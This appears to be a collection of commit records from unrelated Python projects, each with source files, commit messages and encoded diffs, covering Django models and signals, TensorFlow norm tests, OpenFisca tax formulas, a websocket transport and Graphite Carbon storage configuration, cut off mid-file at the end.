@@ -1241,16 +1241,44 @@
Key(Idea
+, related_name='suggestions'
)%0A%09%0A%09def
@@ -1467,14 +1467,9 @@
vent
-_owner
+s
')%0A%09
@@ -1523,16 +1523,46 @@
'Invite'
+, related_name='event_invites'
)%0A%09descr
@@ -1627,16 +1627,39 @@
Location
+, related_name='events'
)%0A%09start
@@ -2145,16 +2145,40 @@
ey(Event
+, related_name='invites'
)%0A%09user
@@ -2201,16 +2201,40 @@
Key(User
+, related_name='invites'
)%0A%09rsvp
|
ffb9c7c7f2d3b957c6b3eb458a647653f55af7d3
|
version number
|
invoice_webkit/__openerp__.py
|
invoice_webkit/__openerp__.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011 Camptocamp SA (http://www.camptocamp.com)
# @author Guewen Baconnier, Bessi Nicolas, Vincent Renaville
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{ 'name': 'Invoice Report using Webkit Library',
  'version': '1.0',
  'category': 'Reports/Webkit',
  'description': """
Replaces the legacy rml Invoice report by a brand new webkit report.
""",
  'author': 'Camptocamp',
  'website': 'http://www.camptocamp.com',
  # report_webkit provides the rendering engine, base_headers_webkit the
  # shared header/footer definitions, account the invoice model itself.
  'depends': ['base', 'report_webkit', 'base_headers_webkit', 'account'],
  'init_xml': [],
  # XML loaded on install/update: report declaration and invoice view changes.
  'update_xml': ['invoice_report.xml',
                 'view/invoice_view.xml'],
  'demo_xml': [],
  'test': [],
  'installable': True,
  'active': False,
}
|
Python
| 0.000003
|
@@ -1064,16 +1064,18 @@
on': '1.
+1.
0',%0A
|
2edb2145f6f7447a7c659d7eeb51c7b75aa0c6d4
|
Add generate username signal
|
rhinocloud/contrib/auth/signals.py
|
rhinocloud/contrib/auth/signals.py
|
from django.contrib.auth.models import User
from rhinocloud.utils import random_generator
def username_shorten(sender, instance, **kwargs):
    """Keep User.username within the 30-character column limit.

    Over-long usernames are replaced by a randomised value derived from
    the first 25 characters.
    """
    if sender != User:
        return
    if len(instance.username) > 30:
        instance.username = random_generator(instance.username[:25])
def first_name_shorten(sender, instance, **kwargs):
    """Truncate User.first_name to the 30-character column limit."""
    if sender != User:
        return
    if len(instance.first_name) > 30:
        instance.first_name = instance.first_name[:30]
def last_name_shorten(sender, instance, **kwargs):
    """Truncate User.last_name to the 30-character column limit.

    BUG FIX: the guard previously measured len(instance.username), so an
    over-long last_name slipped through unchanged (and a long username
    could truncate an already-valid last_name).
    """
    if sender == User:
        if len(instance.last_name) > 30:
            instance.last_name = instance.last_name[:30]
|
Python
| 0.000297
|
@@ -85,16 +85,271 @@
rator%0A%0A%0A
+def generate_username_from_email(sender, instance, **kwargs):%0A if sender == User:%0A username = instance.email%0A if len(username) %3E 30:%0A username = random_generator(username%5B:25%5D)%0A instance.username = username%0A %0A
def user
|
c15dbc39505de93770fd89cab4f4ae9a2a72b4e1
|
fix test
|
tensorflow/python/kernel_tests/norm_op_test.py
|
tensorflow/python/kernel_tests/norm_op_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.norm."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.platform import test as test_lib
def _AddTest(test, test_name, fn):
test_name = "_".join(["test", test_name])
if hasattr(test, test_name):
raise RuntimeError("Test %s defined more than once" % test_name)
setattr(test, test_name, fn)
class NormOpTest(test_lib.TestCase):
  """Error-handling tests for tf.norm argument validation."""

  def testBadOrder(self):
    """Unsupported `ord` values must be rejected for every axis form."""
    matrix = [[0., 1.], [2., 3.]]
    for ord_ in "foo", -7, -1.1, 0:
      with self.assertRaisesRegexp(ValueError,
                                   "'ord' must be a supported vector norm"):
        # BUG FIX: the literal "fro" was passed here instead of the loop
        # variable, so none of these values were actually exercised.
        linalg_ops.norm(matrix, ord=ord_)

    for ord_ in "foo", -7, -1.1, 0:
      with self.assertRaisesRegexp(ValueError,
                                   "'ord' must be a supported vector norm"):
        linalg_ops.norm(matrix, ord=ord_, axis=-1)

    for ord_ in 1.1, 2:
      with self.assertRaisesRegexp(ValueError,
                                   "'ord' must be a supported matrix norm"):
        linalg_ops.norm(matrix, ord=ord_, axis=[-2, -1])

  def testInvalidAxis(self):
    """Malformed `axis` arguments must be rejected."""
    matrix = [[0., 1.], [2., 3.]]
    for axis_ in [], [1, 2, 3], [[1]], [[1], [2]], [3.1415], [1, 1]:
      error_prefix = ("'axis' must be None, an integer, or a tuple of 2 unique "
                      "integers")
      with self.assertRaisesRegexp(ValueError, error_prefix):
        linalg_ops.norm(matrix, axis=axis_)
def _GetNormOpTest(dtype_, shape_, ord_, axis_, keep_dims_, use_static_shape_):
  """Build a test method comparing tf.norm against numpy.linalg.norm for
  one (dtype, shape, ord, axis, keep_dims, static/dynamic-shape) combo."""

  def _CompareNorm(self, matrix):
    # Reference value from numpy; tf.norm must agree within tolerance.
    np_norm = np.linalg.norm(matrix, ord=ord_, axis=axis_, keepdims=keep_dims_)
    with self.test_session(use_gpu=True) as sess:
      if use_static_shape_:
        tf_matrix = constant_op.constant(matrix)
        tf_norm = linalg_ops.norm(
            tf_matrix, ord=ord_, axis=axis_, keep_dims=keep_dims_)
        tf_norm_val = sess.run(tf_norm)
      else:
        # Dynamic shape: feed the matrix through a typed placeholder.
        tf_matrix = array_ops.placeholder(dtype_)
        tf_norm = linalg_ops.norm(
            tf_matrix, ord=ord_, axis=axis_, keep_dims=keep_dims_)
        tf_norm_val = sess.run(tf_norm, feed_dict={tf_matrix: matrix})
    self.assertAllClose(np_norm, tf_norm_val)

  def Test(self):
    is_matrix_norm = (isinstance(axis_, tuple) or
                      isinstance(axis_, list)) and len(axis_) == 2
    is_fancy_p_norm = np.isreal(ord_) and np.floor(ord_) != ord_
    if ((not is_matrix_norm and ord_ == "fro") or
        (is_matrix_norm and is_fancy_p_norm)):
      self.skipTest("Not supported by neither numpy.linalg.norm nor tf.norm")
    # BUG FIX: this previously read the module-level `shape` leaked from the
    # generation loop in __main__ (whatever its last value was), not this
    # test's own `shape_` parameter.
    if ord_ == 'euclidean' or (axis_ is None and len(shape_) > 2):
      self.skipTest("Not supported by numpy.linalg.norm")
    matrix = np.random.randn(*shape_).astype(dtype_)
    if dtype_ in (np.complex64, np.complex128):
      matrix += 1j * np.random.randn(*shape_).astype(dtype_)
    _CompareNorm(self, matrix)

  return Test
# pylint: disable=redefined-builtin
if __name__ == "__main__":
  # Generate one test method per combination of shape/dtype/ord/axis/
  # keep_dims/static-shape, attached to NormOpTest via _AddTest.
  for use_static_shape in False, True:
    for dtype in np.float32, np.float64, np.complex64, np.complex128:
      for rows in 2, 5:
        for cols in 2, 5:
          for batch in [], [2], [2, 3]:
            shape = batch + [rows, cols]
            for ord in "euclidean", "fro", 0.5, 1, 2, np.inf:
              for axis in [
                  None, (-2, -1), (-1, -2), -len(shape), 0, len(shape) - 1
              ]:
                for keep_dims in False, True:
                  # Encode every parameter in the test name for reporting.
                  name = "%s_%s_ord_%s_axis_%s_%s_%s" % (
                      dtype.__name__, "_".join(map(str, shape)), ord, axis,
                      keep_dims, use_static_shape)
                  _AddTest(NormOpTest, "Norm_" + name,
                           _GetNormOpTest(dtype, shape, ord, axis, keep_dims,
                                          use_static_shape))

  test_lib.main()
|
Python
| 0.000002
|
@@ -1372,33 +1372,33 @@
for ord_ in %22f
-o
+r
o%22, -7, -1.1, 0:
@@ -1558,21 +1558,20 @@
ix, ord=
-%22fro%22
+ord_
)%0A%0A f
@@ -1583,17 +1583,17 @@
d_ in %22f
-o
+r
o%22, -7,
@@ -1797,14 +1797,28 @@
in
+%22foo%22, -7, -1.1,
1.1
-, 2
:%0A
|
916638e11ef20e2976c81f0e8230079cf96a3c3a
|
Set DJANGO_SETTINGS_MODULE env variable.
|
ibms_project/wsgi.py
|
ibms_project/wsgi.py
|
"""
WSGI config for IBMS project.
It exposes the WSGI callable as a module-level variable named ``application``.
"""
import dotenv
from django.core.wsgi import get_wsgi_application
import os
from pathlib import Path
# These lines are required for interoperability between local and container environments.
d = Path(__file__).resolve().parents[1]
dot_env = os.path.join(str(d), '.env')
if os.path.exists(dot_env):
    dotenv.read_dotenv(dot_env)

# BUG FIX: get_wsgi_application() requires DJANGO_SETTINGS_MODULE; set a
# sensible default so WSGI containers that don't export it still work
# (setdefault keeps any value supplied by the environment).
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ibms_project.settings")

application = get_wsgi_application()
|
Python
| 0
|
@@ -440,16 +440,89 @@
t_env)%0A%0A
+os.environ.setdefault(%22DJANGO_SETTINGS_MODULE%22, %22ibms_project.settings%22)%0A
applicat
|
2636d76fa4d9dd820fd673bc6044f4c3ccdfd0b1
|
Fix permissions fixture problem.
|
src/encoded/tests/test_permissions.py
|
src/encoded/tests/test_permissions.py
|
import pytest
@pytest.datafixture
def users(app):
    """Seed labs, awards and users through the API as the TEST user.

    Returns the created user objects (the '@graph' entries).
    """
    from webtest import TestApp
    environ = {
        'HTTP_ACCEPT': 'application/json',
        'REMOTE_USER': 'TEST',
    }
    testapp = TestApp(app, environ)

    from .sample_data import URL_COLLECTION

    # Labs and awards must exist before users that reference them.
    for url in ('/labs/', '/awards/'):
        for item in URL_COLLECTION[url]:
            testapp.post_json(url, item, status=201)

    created = []
    for item in URL_COLLECTION['/users/']:
        res = testapp.post_json('/users/', item, status=201)
        created.append(res.json['@graph'][0])
    return created
@pytest.fixture
def wrangler(users, app, external_tx, zsa_savepoints):
    """TestApp authenticated as the first user in the 'wrangler' group."""
    from webtest import TestApp
    wrangler_user = [u for u in users if 'wrangler' in u['groups']][0]
    return TestApp(app, {
        'HTTP_ACCEPT': 'application/json',
        'REMOTE_USER': str(wrangler_user['uuid']),
    })
@pytest.fixture
def submitter(users, app, external_tx, zsa_savepoints):
    """TestApp authenticated as the first user with no special groups."""
    from webtest import TestApp
    plain_user = [u for u in users if not u['groups']][0]
    return TestApp(app, {
        'HTTP_ACCEPT': 'application/json',
        'REMOTE_USER': str(plain_user['uuid']),
    })
@pytest.fixture
def lab():
    # UUID of the lab the submitter belongs to (seeded by the users fixture).
    return 'b635b4ed-dba3-4672-ace9-11d76a8d03af'
@pytest.fixture
def award():
    # Name of the award used when posting experiments in these tests.
    return 'Myers'
@pytest.mark.parametrize('url', ['/organisms/', '/sources/'])
def test_wrangler_post_non_lab_collection(wrangler, url):
    """Wranglers may create items in non-lab collections."""
    from .sample_data import URL_COLLECTION
    for item in URL_COLLECTION[url]:
        res = wrangler.post_json(url, item, status=201)
        assert item['name'] in res.location
@pytest.mark.parametrize('url', ['/organisms/', '/sources/'])
def test_submitter_post_non_lab_collection(submitter, url):
    """Plain submitters are denied (403) on non-lab collections."""
    from .sample_data import URL_COLLECTION
    for item in URL_COLLECTION[url]:
        # Drop the fixed uuid so the server would have to mint one.
        payload = dict(item)
        del payload['uuid']
        submitter.post_json(url, payload, status=403)
def test_submitter_post_update_experiment(submitter, lab, award):
    """A submitter can create, then edit, an experiment for their own lab."""
    res = submitter.post_json('/experiment/', {'lab': lab, 'award': award},
                              status=201)
    location = res.location
    perm = submitter.get(location + '@@testing-allowed?permission=edit',
                         status=200)
    assert perm.json['has_permission'] is True
    assert 'submits_for.%s' % lab in perm.json['principals_allowed_by_permission']
    submitter.patch_json(location, {'description': 'My experiment'}, status=200)
|
Python
| 0
|
@@ -16,20 +16,16 @@
@pytest.
-data
fixture%0A
@@ -38,178 +38,17 @@
ers(
+test
app):
-%0A from webtest import TestApp%0A environ = %7B%0A 'HTTP_ACCEPT': 'application/json',%0A 'REMOTE_USER': 'TEST',%0A %7D%0A testapp = TestApp(app, environ)%0A
%0A
|
1a6c6228927b343071d0fc5e1959920bf30e6252
|
clean up
|
darkoob/social/models.py
|
darkoob/social/models.py
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from neomodel import StructuredNode, IntegerProperty, RelationshipTo, RelationshipFrom
from darkoob.book.models import Quote, Book
import datetime
from django.utils.timezone import utc
# Allowed values for UserProfile.sex: (stored value, human-readable label).
SEX_CHOICES = (
    ('Male', 'Male'),
    ('Female', 'Female'),
)
class UserNode(StructuredNode):
    """Graph node mirroring a Django user, holding FOLLOW relationships."""
    user_id = IntegerProperty(required=True, index=True)
    following = RelationshipTo('UserNode', 'FOLLOW')
    followers = RelationshipFrom('UserNode', 'FOLLOW')

    def follow_person(self, user_id):
        """Create a timestamped FOLLOW relationship to user *user_id*."""
        target = self.index.get(user_id=user_id)
        self.following.connect(target, {'time': str(datetime.datetime.utcnow())})

    def is_following(self, user_id):
        """True when this node follows the user with *user_id*."""
        other = self.index.get(user_id=user_id)
        return other in self.following.all()

    def is_followers(self, user_id):
        """True when the user with *user_id* follows this node."""
        other = self.index.get(user_id=user_id)
        return other in self.followers.all()
class Country(models.Model):
    """Country referenced by City."""
    name = models.CharField(max_length=50)

    def __unicode__(self):
        return self.name
class City(models.Model):
    """City within a Country, referenced by user profiles."""
    name = models.CharField(max_length=50)
    country = models.OneToOneField(Country)

    def __unicode__(self):
        return self.name
class UserProfile(models.Model):
    """Extra per-user data; auto-created by the post_save hook below."""
    user = models.OneToOneField(User)
    sex = models.CharField(max_length=6, choices=SEX_CHOICES)
    birthday = models.DateField(null=True)
    mobile = models.CharField(max_length=20, null=True, blank=True)
    website = models.URLField(null=True, blank=True)
    city = models.OneToOneField(City, null=True, blank=True)
    quote = models.ForeignKey(Quote, null=True, blank=True)
    favorite_books = models.ManyToManyField(Book, null=True, blank=True)

    # for django model
    # def favorite_books(self):
    #     return ', '.join([a.title for a in self.favorite_books.all()])
    # favorite_books.short_description = "Favorite Book"

    # NOTE: userprof_obj.education_set.all() return all education set of a person
    # def get_related_migrations(self):
    #     from darkoob.migration.models import Migration, Hop
    #     print Hop.objects.filter(host=user)

    def __unicode__(self):
        return self.user.get_full_name()
class School(models.Model):
    """School referenced by Education entries."""
    name = models.CharField(max_length=50)

    def __unicode__(self):
        return self.name
class Education(models.Model):
    """Links a user profile to a school (profile.education_set)."""
    user_profile = models.ForeignKey(UserProfile, related_name='education_set')
    school = models.OneToOneField(School)

    def __unicode__(self):
        return unicode(self.school)
def create_user_profile(sender, instance, created, **kwargs):
    # post_save hook: give every newly created User a relational profile
    # and a matching graph node (only on creation, not on later saves).
    if created:
        UserProfile.objects.create(user=instance)
        UserNode(user_id=instance.id).save()
        print "a node with user_id %d created!" % instance.id

post_save.connect(create_user_profile, sender=User)
|
Python
| 0.000001
|
@@ -602,32 +602,82 @@
self, user_id):%0A
+ ''' follow person that user.id=user_id'''%0A
followed
@@ -708,32 +708,32 @@
ser_id=user_id)%0A
-
self.fol
@@ -805,16 +805,17 @@
ow())%7D)%0A
+%0A
def
@@ -1025,16 +1025,17 @@
e False%0A
+%0A
def
@@ -1173,32 +1173,32 @@
ser_id=user_id)%0A
+
return T
@@ -1245,18 +1245,16 @@
False%0A%0A
-%0A%0A
class Co
|
d51a13ed70c157d90c2d77461ad1747f7ce12e7c
|
Improve comment syntax
|
openfisca_country_template/variables/taxes.py
|
openfisca_country_template/variables/taxes.py
|
# -*- coding: utf-8 -*-
# This file defines the variables of our legislation.
# A variable is property of a person, or an entity (e.g. a household).
# See http://openfisca.org/doc/variables.html
# Import from openfisca-core the common python objects used to code the legislation in OpenFisca
from openfisca_core.model_api import *
# Import the entities specifically defined for this tax and benefit system
from openfisca_country_template.entities import *
class income_tax(Variable):
    value_type = float
    entity = Person
    definition_period = MONTH
    label = u"Income tax"
    reference = "https://law.gov.example/income_tax"  # Always use the most official source

    # The formula to compute the income tax for a given person at a given period
    def formula(person, period, parameters):
        # Flat-rate tax: salary times the legislated income_tax_rate parameter.
        return person('salary', period) * parameters(period).taxes.income_tax_rate
class social_security_contribution(Variable):
    value_type = float
    entity = Person
    definition_period = MONTH
    label = u"Progressive contribution paid on salaries to finance social security"
    reference = "https://law.gov.example/social_security_contribution"  # Always use the most official source

    def formula(person, period, parameters):
        salary = person('salary', period)

        # The social_security_contribution is computed according to a marginal scale.
        scale = parameters(period).taxes.social_security_contribution

        return scale.calc(salary)
class housing_tax(Variable):
value_type = float
entity = Household
definition_period = YEAR # This housing tax is defined for a year.
label = u"Tax paid by each household proportionally to the size of its accommodation"
reference = "https://law.gov.example/housing_tax" # Always use the most official source
def formula(household, period, parameters):
# The housing tax is defined for a year, but depends on the `accomodation_size` and `housing_occupancy_status` on the first month of the year.
# Here period is a year. We can get the first month of a year with the following shortcut.
# To build different periods, see http://openfisca.org/doc/coding-the-legislation/35_periods.html#calculating-dependencies-for-a-specific-period
january = period.first_month
accommodation_size = household('accomodation_size', january)
# `housing_occupancy_status` is an Enum variable
occupancy_status = household('housing_occupancy_status', january)
HousingOccupancyStatus = occupancy_status.possible_values # Get the enum associated with the variable
# To access an enum element, we use the . notation.
tenant = (occupancy_status == HousingOccupancyStatus.tenant)
owner = (occupancy_status == HousingOccupancyStatus.owner)
# The tax is applied only if the household owns or rents its main residency
return (owner + tenant) * accommodation_size * 10
|
Python
| 0.000015
|
@@ -2658,17 +2658,19 @@
use the
-.
+%60.%60
notatio
|
da1df870f5d5b7703c4c4c3a6b8cb7d140778469
|
Set default task target to 100.
|
source/vistas/core/task.py
|
source/vistas/core/task.py
|
from threading import RLock
class Task:
STOPPED = 'stopped'
RUNNING = 'running'
INDETERMINATE = 'indeterminate'
COMPLETE = 'complete'
SHOULD_STOP = 'should_stop'
tasks = []
def __init__(self, name, description=None, target=0, progress=0):
self.name = name
self.description = description
self._target = target
self._progress = progress
self._status = self.STOPPED
self.lock = RLock()
Task.tasks.append(self)
@property
def stopped(self):
return self._status == self.STOPPED
@property
def running(self):
return self._status == self.RUNNING
@property
def indeterminate(self):
return self._status == self.INDETERMINATE
@property
def complete(self):
return self._status == self.COMPLETE
@property
def should_stop(self):
return self._status == self.SHOULD_STOP
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
if self.complete:
Task.tasks.remove(self)
@property
def target(self):
with self.lock:
return self._target
@target.setter
def target(self, value):
with self.lock:
self._target = value
@property
def progress(self):
with self.lock:
return self._progress
@progress.setter
def progress(self, value):
with self.lock:
self._progress = value
@property
def percent(self):
with self.lock:
return int(self._progress / self._target * 100)
def inc_target(self, increment=1):
with self.lock:
self._target += increment
def inc_progress(self, increment=1):
with self.lock:
self._progress += increment
|
Python
| 0.00002
|
@@ -248,16 +248,18 @@
target=
+10
0, progr
|
28634376d83595783a52255baee172c88dc33b71
|
fix find_user
|
oclubs/objs/user.py
|
oclubs/objs/user.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
from __future__ import absolute_import, unicode_literals
from flask_login import UserMixin
from passlib.context import CryptContext
from xkcdpass import xkcd_password as xp
from oclubs.access import database, email
from oclubs.enums import UserType
from oclubs.exceptions import NoRow
from oclubs.objs.base import BaseObject, Property, ListProperty
_crypt = CryptContext(schemes=['bcrypt']) # , 'sha512_crypt', 'pbkdf2_sha512'
_words = xp.generate_wordlist(wordfile=xp.locate_wordfile())
def _encrypt(password):
if password is None:
return ''
else:
return _crypt.encrypt(password)
class User(BaseObject, UserMixin):
table = 'user'
identifier = 'user_id'
studentid = Property('user_login_name')
passportname = Property('user_passport_name')
password = Property('user_password', (NotImplemented, _encrypt))
nickname = Property('user_nick_name', rediscached=True)
email = Property('user_email')
phone = Property('user_phone')
picture = Property('user_picture', 'Upload')
type = Property('user_type', UserType)
grade = Property('user_grade')
currentclass = Property('user_class')
clubs = ListProperty('club_member', 'cm_user', 'cm_club', 'Club')
def cas_in_club(self, club):
return database.fetch_oneentry(
'attendance',
database.RawSQL('SUM(act_cas)'),
{
'join': [('inner', 'activity', [('act_id', 'att_act')])],
'where': [('=', 'att_user', self.id)],
}
) or 0
def activities_reminder(self, types, signedup_only=False):
from oclubs.objs import Activity
if signedup_only:
return Activity.get_activities_conditions(
types,
{
'join': [('inner', 'signup',
[('act_id', 'signup_act')])],
'where': [('=', 'signup_user', self.id)]
},
dates=(False, True),
order_by_time=True
)
else:
return Activity.get_activities_conditions(
types,
{
'join': [('inner', 'club_member',
[('act_club', 'cm_club')])],
'where': [('=', 'cm_user', self.id)]
},
dates=(False, True),
order_by_time=True
)
def email_user(self, title, contents):
address = self.email or 'root@localhost'
email.send((address, self.passportname), title, contents)
@staticmethod
def attempt_login(studentid, password):
def emptypw():
# to gave some delay, verify empty password and discard the results
_crypt.verify(
password,
'$2a$12$mf04JOZtIxRtPFw793AGyeYGHGuiN2ikL/HO9fEKdCIilJqwRZKg.'
)
if not password:
emptypw()
return
try:
data = database.fetch_onerow(
'user',
{'user_id': 'id', 'user_password': 'password'},
{'user_login_name': studentid}
)
except NoRow:
emptypw()
return
else:
if not data['password']:
emptypw()
return
elif _crypt.verify(password, data['password']):
return User(data['id'])
else:
return
@staticmethod
def find_user(studentid, passportname):
try:
data = database.fetch_onerow(
'user',
{'user_id': 'id', 'user_passport_name': 'passportname'},
{'user_login_name': studentid}
)
except NoRow:
return
else:
if _crypt.verify(passportname, data['passportname']):
return User(data['id'])
else:
return
@classmethod
def allusers(cls):
tempdata = database.fetch_onecol(
cls.table,
cls.identifier,
[]
)
return [cls(item) for item in tempdata]
@staticmethod
def generate_password():
return xp.generate_xkcdpassword(_words)
|
Python
| 0.999159
|
@@ -3598,39 +3598,44 @@
ry:%0A
-data =
+return User(
database.fetch_o
@@ -3628,35 +3628,37 @@
tabase.fetch_one
-row
+entry
(%0A
@@ -3675,33 +3675,32 @@
-%7B
'user_id': 'id',
@@ -3696,54 +3696,27 @@
_id'
-: 'id', 'user_passport_name': 'passportname'%7D,
+,%0A %7B
%0A
@@ -3720,33 +3720,36 @@
-%7B
+
'user_login_name
@@ -3752,33 +3752,33 @@
name': studentid
-%7D
+,
%0A )%0A
@@ -3770,34 +3770,32 @@
-)%0A
except NoRow
@@ -3786,92 +3786,22 @@
-except NoRow:%0A return%0A else:%0A if _crypt.verify(
+'user_
passport
name
@@ -3800,20 +3800,16 @@
port
+_
name
-, data%5B'
+':
pass
@@ -3816,20 +3816,16 @@
portname
-'%5D):
%0A
@@ -3837,54 +3837,47 @@
-return User(data%5B'id'%5D)%0A else:%0A
+%7D%0A ))%0A except NoRow:%0A
|
8fbef5b55d5ac5d288582a7395e37c963843852b
|
Add exception handling
|
devicehive/transports/websocket_transport.py
|
devicehive/transports/websocket_transport.py
|
from devicehive.transports.transport import Transport
from devicehive.transports.transport import TransportRequestException
import websocket
import threading
import time
class WebsocketTransport(Transport):
"""Websocket transport class."""
def __init__(self, data_format_class, data_format_options, handler_class,
handler_options):
Transport.__init__(self, 'websocket', data_format_class,
data_format_options, handler_class, handler_options)
self._connection_thread = None
self._websocket = websocket.WebSocket()
self._pong_received = False
self._event_queue = []
if self._data_type == 'text':
self._data_opcode = websocket.ABNF.OPCODE_TEXT
else:
self._data_opcode = websocket.ABNF.OPCODE_BINARY
def _connection(self, url, options):
pong_timeout = options.pop('pong_timeout', None)
self._connect(url, **options)
if pong_timeout:
ping_thread = threading.Thread(target=self._ping,
args=(pong_timeout,))
ping_thread.name = 'websocket-transport-ping'
ping_thread.daemon = True
ping_thread.start()
self._receive()
self._close()
def _connect(self, url, **options):
timeout = options.pop('timeout', None)
self._websocket.connect(url, **options)
self._websocket.settimeout(timeout)
self._connected = True
self._call_handler_method('handle_connect')
def _ping(self, pong_timeout):
while self._connected:
self._websocket.ping()
self._pong_received = False
time.sleep(pong_timeout)
if not self._pong_received:
self._connected = False
return
def _receive(self):
while self._connected:
if len(self._event_queue):
event = self._event_queue.pop(0)
self._call_handler_method('handle_event', event)
continue
opcode, frame = self._websocket.recv_data_frame(True)
if opcode == websocket.ABNF.OPCODE_TEXT:
event = self._decode(frame.data.decode('utf-8'))
self._call_handler_method('handle_event', event)
continue
if opcode == websocket.ABNF.OPCODE_BINARY:
event = self._decode(frame.data)
self._call_handler_method('handle_event', event)
continue
if opcode == websocket.ABNF.OPCODE_PONG:
self._pong_received = True
continue
if opcode == websocket.ABNF.OPCODE_CLOSE:
return
def _close(self):
self._websocket.close()
self._pong_received = False
self._event_queue = []
self._call_handler_method('handle_close')
def _send_request(self, action, request):
request[self.REQUEST_ID_KEY] = self._uuid()
request[self.REQUEST_ACTION_KEY] = action
self._websocket.send(self._encode(request), opcode=self._data_opcode)
return request[self.REQUEST_ID_KEY]
def connect(self, url, **options):
self._ensure_not_connected()
self._connection_thread = threading.Thread(target=self._connection,
args=(url, options))
self._connection_thread.name = 'websocket-transport-connection'
self._connection_thread.daemon = True
self._connection_thread.start()
def send_request(self, action, request, **params):
self._ensure_connected()
return self._send_request(action, request)
def request(self, action, request, **params):
self._ensure_connected()
timeout = params.pop('timeout', 30)
request_id = self._send_request(action, request)
send_time = time.time()
while time.time() - timeout < send_time:
response = self._decode(self._websocket.recv())
if response.get(self.REQUEST_ID_KEY) == request_id:
return response
self._event_queue.append(response)
raise WebsocketTransportRequestException('Timeout occurred')
def close(self):
self._ensure_connected()
self._connected = False
def join(self, timeout=None):
self._connection_thread.join(timeout)
class WebsocketTransportRequestException(TransportRequestException):
"""Websocket transport request exception."""
pass
|
Python
| 0.000005
|
@@ -151,16 +151,27 @@
reading%0A
+import sys%0A
import t
@@ -926,32 +926,49 @@
timeout', None)%0A
+ try:%0A
self._co
@@ -997,16 +997,20 @@
+
if pong_
@@ -1018,16 +1018,20 @@
imeout:%0A
+
@@ -1123,24 +1123,28 @@
+
args=(pong_t
@@ -1157,32 +1157,36 @@
,))%0A
+
+
ping_thread.name
@@ -1219,32 +1219,36 @@
ng'%0A
+
ping_thread.daem
@@ -1261,32 +1261,36 @@
rue%0A
+
+
ping_thread.star
@@ -1297,24 +1297,28 @@
t()%0A
+
self._receiv
@@ -1325,24 +1325,28 @@
e()%0A
+
+
self._close(
@@ -1346,16 +1346,91 @@
_close()
+%0A except BaseException:%0A self._exception = sys.exc_info()
%0A%0A de
|
f0732e9ffd8ba84707d0805bf1b15c5ff9270971
|
Update storage.py
|
lib/carbon/storage.py
|
lib/carbon/storage.py
|
"""Copyright 2009 Chris Davis
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import re
from os.path import join
from carbon.conf import OrderedConfigParser, settings
from carbon.exceptions import CarbonConfigException
from carbon.util import parseRetentionDef
from carbon import log, state
STORAGE_SCHEMAS_CONFIG = join(settings.CONF_DIR, 'storage-schemas.conf')
STORAGE_AGGREGATION_CONFIG = join(settings.CONF_DIR, 'storage-aggregation.conf')
STORAGE_LISTS_DIR = join(settings.CONF_DIR, 'lists')
class Schema:
def test(self, metric):
raise NotImplementedError()
def matches(self, metric):
return bool(self.test(metric))
class DefaultSchema(Schema):
def __init__(self, name, archives):
self.name = name
self.archives = archives
def test(self, metric):
return True
class PatternSchema(Schema):
def __init__(self, name, pattern, archives):
self.name = name
self.pattern = pattern
self.regex = re.compile(pattern)
self.archives = archives
def test(self, metric):
return self.regex.search(metric)
class Archive:
def __init__(self, secondsPerPoint, points):
self.secondsPerPoint = int(secondsPerPoint)
self.points = int(points)
def __str__(self):
return "Archive = (Seconds per point: %d, Datapoints to save: %d)" % (
self.secondsPerPoint, self.points)
def getTuple(self):
return (self.secondsPerPoint, self.points)
@staticmethod
def fromString(retentionDef):
(secondsPerPoint, points) = parseRetentionDef(retentionDef)
return Archive(secondsPerPoint, points)
def loadStorageSchemas():
schemaList = []
config = OrderedConfigParser()
config.read(STORAGE_SCHEMAS_CONFIG)
for section in config.sections():
options = dict(config.items(section))
pattern = options.get('pattern')
try:
retentions = options['retentions'].split(',')
except KeyError:
log.err("Schema %s missing 'retentions', skipping" % section)
continue
try:
archives = [Archive.fromString(s) for s in retentions]
except ValueError as exc:
log.err("{msg} in section [{section}] in {fn}".format(
msg=exc, section=section.title(), fn=STORAGE_SCHEMAS_CONFIG))
raise SystemExit(1)
if pattern:
mySchema = PatternSchema(section, pattern, archives)
else:
log.err("Schema %s missing 'pattern', skipping" % section)
continue
archiveList = [a.getTuple() for a in archives]
try:
if state.database is not None:
state.database.validateArchiveList(archiveList)
schemaList.append(mySchema)
except ValueError as e:
log.msg("Invalid schemas found in %s: %s" % (section, e))
schemaList.append(defaultSchema)
return schemaList
def loadAggregationSchemas():
# NOTE: This abuses the Schema classes above, and should probably be refactored.
schemaList = []
config = OrderedConfigParser()
try:
config.read(STORAGE_AGGREGATION_CONFIG)
except (IOError, CarbonConfigException):
log.msg("%s not found or wrong perms, ignoring." % STORAGE_AGGREGATION_CONFIG)
for section in config.sections():
options = dict(config.items(section))
pattern = options.get('pattern')
